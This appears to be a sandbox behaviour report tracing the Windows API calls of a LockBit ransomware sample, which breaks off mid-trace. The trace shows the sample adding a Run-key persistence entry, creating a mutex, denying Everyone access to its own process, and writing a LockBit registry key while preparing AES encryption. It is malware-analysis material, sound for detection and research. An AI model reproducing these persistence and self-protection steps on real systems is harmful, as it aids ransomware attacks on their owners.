Region: id = 1464 start_va = 0x16710000 end_va = 0x1674ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000016710000" filename = "" Region: id = 1465 start_va = 0x16750000 end_va = 0x1684ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000016750000" filename = "" Region: id = 1466 start_va = 0x16850000 end_va = 0x1688ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000016850000" filename = "" Region: id = 1467 start_va = 0x16890000 end_va = 0x1698ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000016890000" filename = "" Region: id = 1468 start_va = 0x16990000 end_va = 0x169cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000016990000" filename = "" Region: id = 1469 start_va = 0x169d0000 end_va = 0x16acffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000169d0000" filename = "" Region: id = 1470 start_va = 0x16ad0000 end_va = 0x16b0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000016ad0000" filename = "" Region: id = 1471 start_va = 0x16b10000 end_va = 0x16c0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000016b10000" filename = "" Region: id = 1472 start_va = 0x16c10000 end_va = 0x16c4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000016c10000" filename = "" Region: id = 1473 start_va = 0x16c50000 end_va = 0x16d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000016c50000" filename = "" Region: id = 1474 start_va = 0x16d50000 end_va = 0x16d8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000016d50000" filename = "" Region: id = 1475 start_va = 0x16d90000 end_va = 0x16e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000016d90000" filename = "" Region: id = 1476 start_va = 0x16e90000 end_va = 0x16ecffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000016e90000" filename = "" Region: id = 1477 start_va = 0x16ed0000 end_va = 0x16fcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000016ed0000" filename = "" Region: id = 1478 start_va = 0x16fd0000 end_va = 0x1700ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000016fd0000" filename = "" Region: id = 1479 start_va = 0x17010000 end_va = 0x1710ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000017010000" filename = "" Region: id = 1480 start_va = 0x17110000 end_va = 0x1714ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000017110000" filename = "" Region: id = 1481 start_va = 0x17150000 end_va = 0x1724ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000017150000" filename = "" Region: id = 1482 start_va = 0x17250000 end_va = 0x1728ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000017250000" filename = "" Region: id = 1483 start_va = 0x17290000 end_va = 0x1738ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000017290000" filename = "" Region: id = 1484 start_va = 0x17390000 end_va = 0x173cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000017390000" filename = "" Region: id = 1485 start_va = 0x173d0000 end_va = 0x174cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000173d0000" filename = "" Region: id = 1486 start_va = 0x174d0000 end_va = 0x1750ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000174d0000" filename = "" Region: id = 1487 start_va = 0x17510000 end_va = 0x1760ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000017510000" filename = "" Region: id = 1488 start_va = 0x17610000 end_va = 0x1764ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000017610000" filename = "" Region: id = 1489 start_va = 0x17650000 end_va = 0x1774ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000017650000" filename = "" Region: id = 1490 start_va = 0x7ec89000 end_va = 0x7ec8bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ec89000" filename = "" Region: id = 1491 start_va = 0x7ec8c000 end_va = 0x7ec8efff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ec8c000" filename = "" Region: id = 1492 start_va = 0x7ec8f000 end_va = 0x7ec91fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ec8f000" filename = "" Region: id = 1493 start_va = 0x7ec92000 end_va = 0x7ec94fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ec92000" filename = "" Region: id = 1494 start_va = 0x7ec95000 end_va = 0x7ec97fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ec95000" filename = "" Region: id = 1495 start_va = 0x7ec98000 end_va = 0x7ec9afff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ec98000" filename = "" Region: id = 1496 start_va = 0x7ec9b000 end_va = 0x7ec9dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ec9b000" filename = "" Region: id = 1497 start_va = 0x7ec9e000 end_va = 0x7eca0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ec9e000" filename = "" Region: id = 1498 start_va = 0x7eca1000 end_va = 0x7eca3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007eca1000" filename = "" Region: id = 1499 start_va = 0x7eca4000 end_va = 0x7eca6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007eca4000" filename = "" Region: id = 1500 start_va = 0x7eca7000 end_va = 0x7eca9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007eca7000" filename = "" Region: id = 1501 start_va = 0x7ecaa000 end_va = 0x7ecacfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ecaa000" filename = "" Region: id = 1502 start_va = 0x7ecad000 end_va = 0x7ecaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ecad000" filename = "" Region: id = 1503 start_va = 0x7ecb0000 end_va = 0x7ecb2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ecb0000" filename = "" Region: id = 1504 start_va = 0x7ecb3000 end_va = 0x7ecb5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ecb3000" filename = "" Region: id = 1505 start_va = 0x7ecb6000 end_va = 0x7ecb8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ecb6000" filename = "" Region: id = 1506 start_va = 0x7ecb9000 end_va = 0x7ecbbfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ecb9000" filename = "" Region: id = 1507 start_va = 0x7ecbc000 end_va = 0x7ecbefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ecbc000" filename = "" Region: id = 1508 start_va = 0x7ecbf000 end_va = 0x7ecc1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ecbf000" filename = "" Region: id = 1509 start_va = 0x7ecc2000 end_va = 0x7ecc4fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ecc2000" filename = "" Region: id = 1510 start_va = 0x7ecc5000 end_va = 0x7ecc7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ecc5000" filename = "" Region: id = 1511 start_va = 0x7ecc8000 end_va = 0x7eccafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ecc8000" filename = "" Region: id = 1512 start_va = 0x7eccb000 end_va = 0x7eccdfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007eccb000" filename = "" Region: id = 1513 start_va = 0x7ecce000 end_va = 0x7ecd0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ecce000" filename = "" Region: id = 1514 start_va = 0x7ecd1000 end_va = 0x7ecd3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ecd1000" filename = "" Region: id = 1515 start_va = 0x7ecd4000 end_va = 0x7ecd6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ecd4000" filename = "" Region: id = 1516 start_va = 0x7ecd7000 end_va = 0x7ecd9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ecd7000" filename = "" Region: id = 1517 start_va = 0x7ecda000 end_va = 0x7ecdcfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ecda000" filename = "" Region: id = 1518 start_va = 0x7ecdd000 end_va = 0x7ecdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ecdd000" filename = "" Region: id = 1519 start_va = 0x7ece0000 end_va = 0x7ece2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ece0000" filename = "" Region: id = 1520 start_va = 0x7ece3000 end_va = 0x7ece5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ece3000" filename = "" Region: id = 1521 start_va = 0x7ece6000 end_va = 0x7ece8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ece6000" filename = "" Region: id = 1522 start_va = 0x7ece9000 end_va = 0x7ecebfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ece9000" filename = "" Region: id = 1523 start_va = 0x7ecec000 end_va = 0x7eceefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ecec000" filename = "" Region: id = 1524 start_va = 0x7ecef000 end_va = 0x7ecf1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ecef000" filename = "" Region: id = 1525 start_va = 0x7ecf2000 end_va = 0x7ecf4fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ecf2000" filename = "" Region: id = 1526 start_va = 0x7ecf5000 end_va = 0x7ecf7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ecf5000" filename = "" Region: id = 1527 start_va = 0x7ecf8000 end_va = 0x7ecfafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ecf8000" filename = "" Region: id = 1528 start_va = 0x7ecfb000 end_va = 0x7ecfdfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ecfb000" filename = "" Region: id = 1529 start_va = 0x7ecfe000 end_va = 0x7ed00fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ecfe000" filename = "" Region: id = 1530 start_va = 0x7ed01000 end_va = 0x7ed03fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ed01000" filename = "" Region: id = 1531 start_va = 0x7ed04000 end_va = 0x7ed06fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ed04000" filename = "" Region: id = 1532 start_va = 0x7ed07000 end_va = 0x7ed09fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ed07000" filename = "" Thread: id = 1 os_tid = 0xf68 [0062.079] GetCommandLineW () returned="\"C:\\Users\\kEecfMwgj\\Desktop\\0e66029132a885143b87b1e49e32663a52737bbff4ab96186e9e5e829aa2915f.exe\" " [0062.079] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\kEecfMwgj\\Desktop\\0e66029132a885143b87b1e49e32663a52737bbff4ab96186e9e5e829aa2915f.exe\" ", pNumArgs=0x18fca8 | out: pNumArgs=0x18fca8) returned 0x2bc980*="C:\\Users\\kEecfMwgj\\Desktop\\0e66029132a885143b87b1e49e32663a52737bbff4ab96186e9e5e829aa2915f.exe" [0062.080] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x40fef0, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x18fd30 | out: lpThreadId=0x18fd30*=0xf6c) returned 0xc0 [0062.091] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x2bc2f8 [0062.099] CloseServiceHandle (hSCObject=0x2bc2f8) returned 1 [0062.113] OpenMutexA (dwDesiredAccess=0x0, bInheritHandle=0, lpName="Global\\{BEF590BE-11A6-442A-A85B-656C1081E04C}") returned 0x0 [0062.113] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="Global\\{BEF590BE-11A6-442A-A85B-656C1081E04C}") returned 0x10c [0062.113] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2001f, lpSecurityAttributes=0x0, phkResult=0x18fc8c, lpdwDisposition=0x18fc14 | out: phkResult=0x18fc8c*=0x114, lpdwDisposition=0x18fc14*=0x2) returned 0x0 [0062.114] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18f804, nSize=0x104 | out: lpFilename="C:\\Users\\kEecfMwgj\\Desktop\\0e66029132a885143b87b1e49e32663a52737bbff4ab96186e9e5e829aa2915f.exe" (normalized: "c:\\users\\keecfmwgj\\desktop\\0e66029132a885143b87b1e49e32663a52737bbff4ab96186e9e5e829aa2915f.exe")) returned 0x5f [0062.114] wsprintfW (in: param_1=0x18fa0c, param_2="\"%S\"" | out: param_1="\"C\"") returned 3 [0062.116] RegQueryValueExW (in: hKey=0x114, lpValueName="XO1XADpO01", lpReserved=0x0, lpType=0x18fc48, lpData=0x18f5fc, lpcbData=0x18fc4c*=0x104 | out: lpType=0x18fc48*=0x0, lpData=0x18f5fc*=0x28, lpcbData=0x18fc4c*=0x104) returned 0x2 [0062.116] RegSetValueExW (in: hKey=0x114, lpValueName="XO1XADpO01", Reserved=0x0, dwType=0x1, lpData="\"C\"", cbData=0x6 | out: lpData="\"C\"") returned 0x0 [0062.117] RegCloseKey (hKey=0x114) returned 0x0 [0062.117] GetUserDefaultLangID () returned 0x409 [0062.120] GetCurrentProcessId () returned 0xf64 [0062.120] OpenProcess (dwDesiredAccess=0x60000, bInheritHandle=0, dwProcessId=0xf64) returned 0x114 [0062.120] GetSecurityInfo () returned 0x0 [0062.752] AllocateAndInitializeSid (in: pIdentifierAuthority=0x18fcb4, nSubAuthorityCount=0x1, nSubAuthority0=0x0, nSubAuthority1=0x0, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x18fca4 | out: pSid=0x18fca4*=0x2b3790*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0)) returned 1 [0062.752] GetAclInformation (in: pAcl=0x2bd4fc, pAclInformation=0x18fcdc, nAclInformationLength=0xc, dwAclInformationClass=0x2 | out: pAclInformation=0x18fcdc) returned 1 [0062.752] GetLengthSid (pSid=0x2b3790*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0)) returned 0xc [0062.752] malloc (_Size=0x78) returned 0x53d3a8 [0062.752] InitializeAcl (in: pAcl=0x53d3a8, nAclLength=0x78, dwAclRevision=0x4 | out: pAcl=0x53d3a8) returned 1 [0062.752] AddAccessDeniedAce (in: pAcl=0x53d3a8, dwAceRevision=0x4, AccessMask=0x1, pSid=0x2b3790*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0) | out: pAcl=0x53d3a8) returned 1 [0062.752] GetAce (in: pAcl=0x2bd4fc, dwAceIndex=0x0, pAce=0x18fcb0 | out: pAce=0x18fcb0*=0x2bd504) returned 1 [0062.752] AddAce (in: pAcl=0x53d3a8, dwAceRevision=0x4, dwStartingAceIndex=0xffffffff, pAceList=0x2bd504, nAceListLength=0x18 | out: pAcl=0x53d3a8) returned 1 [0062.752] GetAce (in: pAcl=0x2bd4fc, dwAceIndex=0x1, pAce=0x18fcb0 | out: pAce=0x18fcb0*=0x2bd51c) returned 1 [0062.752] AddAce (in: pAcl=0x53d3a8, dwAceRevision=0x4, dwStartingAceIndex=0xffffffff, pAceList=0x2bd51c, nAceListLength=0x14 | out: pAcl=0x53d3a8) returned 1 [0062.752] GetAce (in: pAcl=0x2bd4fc, dwAceIndex=0x2, pAce=0x18fcb0 | out: pAce=0x18fcb0*=0x2bd530) returned 1 [0062.752] AddAce (in: pAcl=0x53d3a8, dwAceRevision=0x4, dwStartingAceIndex=0xffffffff, pAceList=0x2bd530, nAceListLength=0x1c | out: pAcl=0x53d3a8) returned 1 [0062.752] SetSecurityInfo () returned 0x0 [0062.753] free (_Block=0x53d3a8) [0062.753] CloseHandle (hObject=0x114) returned 1 [0062.754] SetErrorMode (uMode=0x7) returned 0x0 [0062.754] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x2bfe30 [0062.754] CloseServiceHandle (hSCObject=0x2bfe30) returned 1 [0062.754] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x410510, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x18fcc4 | out: lpThreadId=0x18fcc4*=0xf7c) returned 0x114 [0062.755] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x40a8b0, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x18fcc4 | out: lpThreadId=0x18fcc4*=0xf80) returned 0x118 [0062.756] wvsprintfA (in: param_1=0x18f6e8, param_2=" AES-NI support enabled", arglist=0x18fc28 | out: param_1=" AES-NI support enabled") returned 23 [0062.756] wsprintfA (in: param_1=0x18f6e8, param_2="%s\r\n" | out: param_1=" AES-NI support enabled\r\n") returned 25 [0062.757] GetLocalTime (in: lpSystemTime=0x18fbe8 | out: lpSystemTime=0x18fbe8*(wYear=0x7e6, wMonth=0x6, wDayOfWeek=0x4, wDay=0x1e, wHour=0xe, wMinute=0x1c, wSecond=0x12, wMilliseconds=0xa2)) [0062.757] wsprintfA (in: param_1=0x18fae8, param_2="[%.2u:%.2u:%.2u] " | out: param_1="[14:28:18] ") returned 11 [0062.757] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0062.757] SetConsoleTextAttribute (hConsoleOutput=0x0, wAttributes=0xa) returned 0 [0062.757] WriteConsoleA (in: hConsoleOutput=0x0, lpBuffer=0x18fae8, nNumberOfCharsToWrite=0xb, lpNumberOfCharsWritten=0x18fc14, lpReserved=0x0 | out: lpNumberOfCharsWritten=0x18fc14*=0x17) returned 0 [0062.758] SetConsoleTextAttribute (hConsoleOutput=0x0, wAttributes=0xf) returned 0 [0062.758] WriteConsoleA (in: hConsoleOutput=0x0, lpBuffer=0x18f6e8, nNumberOfCharsToWrite=0x19, lpNumberOfCharsWritten=0x18fc14, lpReserved=0x0 | out: lpNumberOfCharsWritten=0x18fc14*=0x17) returned 0 [0062.759] wvsprintfA (in: param_1=0x18f6e8, param_2=" RdRand support enabled", arglist=0x18fc28 | out: param_1=" RdRand support enabled") returned 23 [0062.759] wsprintfA (in: param_1=0x18f6e8, param_2="%s\r\n" | out: param_1=" RdRand support enabled\r\n") returned 25 [0062.759] GetLocalTime (in: lpSystemTime=0x18fbe8 | out: lpSystemTime=0x18fbe8*(wYear=0x7e6, wMonth=0x6, wDayOfWeek=0x4, wDay=0x1e, wHour=0xe, wMinute=0x1c, wSecond=0x12, wMilliseconds=0xb2)) [0062.759] wsprintfA (in: param_1=0x18fae8, param_2="[%.2u:%.2u:%.2u] " | out: param_1="[14:28:18] ") returned 11 [0062.759] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0062.759] SetConsoleTextAttribute (hConsoleOutput=0x0, wAttributes=0xa) returned 0 [0062.759] WriteConsoleA (in: hConsoleOutput=0x0, lpBuffer=0x18fae8, nNumberOfCharsToWrite=0xb, lpNumberOfCharsWritten=0x18fc14, lpReserved=0x0 | out: lpNumberOfCharsWritten=0x18fc14*=0x17) returned 0 [0062.759] SetConsoleTextAttribute (hConsoleOutput=0x0, wAttributes=0xf) returned 0 [0062.759] WriteConsoleA (in: hConsoleOutput=0x0, lpBuffer=0x18f6e8, nNumberOfCharsToWrite=0x19, lpNumberOfCharsWritten=0x18fc14, lpReserved=0x0 | out: lpNumberOfCharsWritten=0x18fc14*=0x17) returned 0 [0062.759] malloc (_Size=0x483) returned 0x53d3a8 [0062.759] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="SOFTWARE\\LockBit", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x18fc08, lpdwDisposition=0x18fbcc | out: phkResult=0x18fc08*=0x144, lpdwDisposition=0x18fbcc*=0x1) returned 0x0 [0062.760] RegQueryValueExA (in: hKey=0x144, lpValueName="full", lpReserved=0x0, lpType=0x18fbd0, lpData=0x41ca90, lpcbData=0x18fc04*=0x500 | out: lpType=0x18fbd0*=0x0, lpData=0x41ca90*=0x0, lpcbData=0x18fc04*=0x500) returned 0x2 [0062.760] RegQueryValueExA (in: hKey=0x144, lpValueName="Public", lpReserved=0x0, lpType=0x18fbd0, lpData=0x53d3a8, lpcbData=0x18fc04*=0x103 | out: lpType=0x18fbd0*=0x0, lpData=0x53d3a8*=0xc4, lpcbData=0x18fc04*=0x103) returned 0x2 [0062.760] memcpy (in: _Dst=0x18f034, _Src=0x18ed28, _Size=0x2 | out: _Dst=0x18f034) returned 0x18f034 [0062.760] memcpy (in: _Dst=0x18f036, _Src=0x18ecf4, _Size=0x20 | out: _Dst=0x18f036) returned 0x18f036 [0062.761] memcpy (in: _Dst=0x18f034, _Src=0x18edd8, _Size=0x20 | out: _Dst=0x18f034) returned 0x18f034 [0062.761] memcpy (in: _Dst=0x18ed70, _Src=0x18edd8, _Size=0x20 | out: _Dst=0x18ed70) returned 0x18ed70 [0062.761] memcpy (in: _Dst=0x18ee24, _Src=0x18edd8, _Size=0x20 | out: _Dst=0x18ee24) returned 0x18ee24 [0062.761] memcpy (in: _Dst=0x18ee44, _Src=0x18f404, _Size=0x32 | out: _Dst=0x18ee44) returned 0x18ee44 [0062.761] memcpy (in: _Dst=0x18ec18, _Src=0x18ee24, _Size=0x52 | out: _Dst=0x18ec18) returned 0x18ec18 [0062.761] calloc (_Count=0x1, _Size=0x4) returned 0x5313c8 [0062.761] calloc (_Count=0x20, _Size=0x4) returned 0x53d838 [0062.761] memcpy (in: _Dst=0x53d838, _Src=0x18ef04, _Size=0x10 | out: _Dst=0x53d838) returned 0x53d838 [0062.761] memcpy (in: _Dst=0x53d848, _Src=0x18ef04, _Size=0x10 | out: _Dst=0x53d848) returned 0x53d848 [0062.761] memcpy (in: _Dst=0x53d858, _Src=0x18ef04, _Size=0x10 | out: _Dst=0x53d858) returned 0x53d858 [0062.761] memcpy (in: _Dst=0x53d868, _Src=0x18ef04, _Size=0x10 | out: _Dst=0x53d868) returned 0x53d868 [0062.761] memcpy (in: _Dst=0x53d878, _Src=0x18ef04, _Size=0x10 | out: _Dst=0x53d878) returned 0x53d878 [0062.761] memcpy (in: _Dst=0x53d888, _Src=0x18ef04, _Size=0x10 | out: _Dst=0x53d888) returned 0x53d888 [0062.761] memcpy (in: _Dst=0x53d898, _Src=0x18ef04, _Size=0x10 | out: _Dst=0x53d898) returned 0x53d898 [0062.762] memcpy (in: _Dst=0x53d8a8, _Src=0x18ef04, _Size=0x10 | out: _Dst=0x53d8a8) returned 0x53d8a8 [0062.762] memcpy (in: _Dst=0x53d838, _Src=0x18ef04, _Size=0x10 | out: _Dst=0x53d838) returned 0x53d838 [0062.762] memcpy (in: _Dst=0x53d848, _Src=0x18ef04, _Size=0x10 | out: _Dst=0x53d848) returned 0x53d848 [0062.762] memcpy (in: _Dst=0x53d858, _Src=0x18ef04, _Size=0x10 | out: _Dst=0x53d858) returned 0x53d858 [0062.762] memcpy (in: _Dst=0x53d868, _Src=0x18ef04, _Size=0x10 | out: _Dst=0x53d868) returned 0x53d868 [0062.762] memcpy (in: _Dst=0x53d878, _Src=0x18ef04, _Size=0x10 | out: _Dst=0x53d878) returned 0x53d878 [0062.762] memcpy (in: _Dst=0x53d888, _Src=0x18ef04, _Size=0x10 | out: _Dst=0x53d888) returned 0x53d888 [0062.762] memcpy (in: _Dst=0x53d898, _Src=0x18ef04, _Size=0x10 | out: _Dst=0x53d898) returned 0x53d898 [0062.762] memcpy (in: _Dst=0x53d8a8, _Src=0x18ef04, _Size=0x10 | out: _Dst=0x53d8a8) returned 0x53d8a8 [0062.762] memcpy (in: _Dst=0x53d838, _Src=0x18ef04, _Size=0x10 | out: _Dst=0x53d838) returned 0x53d838 [0062.762] memcpy (in: _Dst=0x53d848, _Src=0x18ef04, _Size=0x10 | out: _Dst=0x53d848) returned 0x53d848 [0062.762] memcpy (in: _Dst=0x53d858, _Src=0x18ef04, _Size=0x10 | out: _Dst=0x53d858) returned 0x53d858 [0062.762] memcpy (in: _Dst=0x53d868, _Src=0x18ef04, _Size=0x10 | out: _Dst=0x53d868) returned 0x53d868 [0062.762] memcpy (in: _Dst=0x53d878, _Src=0x18ef04, _Size=0x10 | out: _Dst=0x53d878) returned 0x53d878 [0062.762] memcpy (in: _Dst=0x53d888, _Src=0x18ef04, _Size=0x10 | out: _Dst=0x53d888) returned 0x53d888 [0062.762] memcpy (in: _Dst=0x53d898, _Src=0x18ef04, _Size=0x10 | out: _Dst=0x53d898) returned 0x53d898 [0062.762] memcpy (in: _Dst=0x53d8a8, _Src=0x18ef04, _Size=0x10 | out: _Dst=0x53d8a8) returned 0x53d8a8 [0062.763] memcpy (in: _Dst=0x53d838, _Src=0x18ef04, _Size=0x10 | out: _Dst=0x53d838) returned 0x53d838 [0062.763] memcpy (in: _Dst=0x53d848, _Src=0x18ef04, _Size=0x10 | out: _Dst=0x53d848) returned 0x53d848 [0062.763] memcpy (in: _Dst=0x53d858, _Src=0x18ef04, _Size=0x10 | out: _Dst=0x53d858) returned 0x53d858 [0062.763] memcpy (in: _Dst=0x53d868, _Src=0x18ef04, _Size=0x10 | out: _Dst=0x53d868) returned 0x53d868 [0062.763] memcpy (in: _Dst=0x53d878, _Src=0x18ef04, _Size=0x10 | out: _Dst=0x53d878) returned 0x53d878 [0062.763] memcpy (in: _Dst=0x53d888, _Src=0x18ef04, _Size=0x10 | out: _Dst=0x53d888) returned 0x53d888 [0062.763] memcpy (in: _Dst=0x53d898, _Src=0x18ef04, _Size=0x10 | out: _Dst=0x53d898) returned 0x53d898 [0062.763] memcpy (in: _Dst=0x53d8a8, _Src=0x18ef04, _Size=0x10 | out: _Dst=0x53d8a8) returned 0x53d8a8 [0062.763] memcpy (in: _Dst=0x53d838, _Src=0x18ef04, _Size=0x10 | out: _Dst=0x53d838) returned 0x53d838 [0062.763] memcpy (in: _Dst=0x53d848, _Src=0x18ef04, _Size=0x10 | out: _Dst=0x53d848) returned 0x53d848 [0062.763] memcpy (in: _Dst=0x53d858, _Src=0x18ef04, _Size=0x10 | out: _Dst=0x53d858) returned 0x53d858 [0062.763] memcpy (in: _Dst=0x53d868, _Src=0x18ef04, _Size=0x10 | out: _Dst=0x53d868) returned 0x53d868 [0062.763] memcpy (in: _Dst=0x53d878, _Src=0x18ef04, _Size=0x10 | out: _Dst=0x53d878) returned 0x53d878 [0062.763] memcpy (in: _Dst=0x53d888, _Src=0x18ef04, _Size=0x10 | out: _Dst=0x53d888) returned 0x53d888 [0062.763] memcpy (in: _Dst=0x53d898, _Src=0x18ef04, _Size=0x10 | out: _Dst=0x53d898) returned 0x53d898 [0062.763] memcpy (in: _Dst=0x53d8a8, _Src=0x18ef04, _Size=0x10 | out: _Dst=0x53d8a8) returned 0x53d8a8 [0062.763] memcpy (in: _Dst=0x53d838, _Src=0x18ef04, _Size=0x10 | out: _Dst=0x53d838) returned 0x53d838 [0062.763] memcpy (in: _Dst=0x53d848, _Src=0x18ef04, _Size=0x10 | out: _Dst=0x53d848) returned 0x53d848 [0062.763] memcpy (in: _Dst=0x53d858, _Src=0x18ef04, _Size=0x10 | out: _Dst=0x53d858) returned 0x53d858 [0062.763] memcpy (in: _Dst=0x53d868, _Src=0x18ef04, _Size=0x10 | out: _Dst=0x53d868) returned 0x53d868 [0062.763] memcpy (in: _Dst=0x53d878, _Src=0x18ef04, _Size=0x10 | out: _Dst=0x53d878) returned 0x53d878 [0062.763] memcpy (in: _Dst=0x53d888, _Src=0x18ef04, _Size=0x10 | out: _Dst=0x53d888) returned 0x53d888 [0062.764] memcpy (in: _Dst=0x53d898, _Src=0x18ef04, _Size=0x10 | out: _Dst=0x53d898) returned 0x53d898 [0062.764] memcpy (in: _Dst=0x53d8a8, _Src=0x18ef04, _Size=0x10 | out: _Dst=0x53d8a8) returned 0x53d8a8 [0062.764] calloc (_Count=0x20, _Size=0x4) returned 0x53d8d8 [0062.764] memcpy (in: _Dst=0x53d8d8, _Src=0x53d838, _Size=0x80 | out: _Dst=0x53d8d8) returned 0x53d8d8 [0062.764] calloc (_Count=0x20, _Size=0x4) returned 0x53d960 [0062.764] memcpy (in: _Dst=0x53d960, _Src=0x53d8d8, _Size=0x80 | out: _Dst=0x53d960) returned 0x53d960 [0062.764] calloc (_Count=0x20, _Size=0x4) returned 0x53d9e8 [0062.765] memcpy (in: _Dst=0x53d9e8, _Src=0x18ee4c, _Size=0x10 | out: _Dst=0x53d9e8) returned 0x53d9e8 [0062.765] memcpy (in: _Dst=0x53d9f8, _Src=0x18ee4c, _Size=0x10 | out: _Dst=0x53d9f8) returned 0x53d9f8 [0062.765] memcpy (in: _Dst=0x53da08, _Src=0x18ee4c, _Size=0x10 | out: _Dst=0x53da08) returned 0x53da08 [0062.765] memcpy (in: _Dst=0x53da18, _Src=0x18ee4c, _Size=0x10 | out: _Dst=0x53da18) returned 0x53da18 [0062.765] memcpy (in: _Dst=0x53da28, _Src=0x18ee4c, _Size=0x10 | out: _Dst=0x53da28) returned 0x53da28 [0062.765] memcpy (in: _Dst=0x53da38, _Src=0x18ee4c, 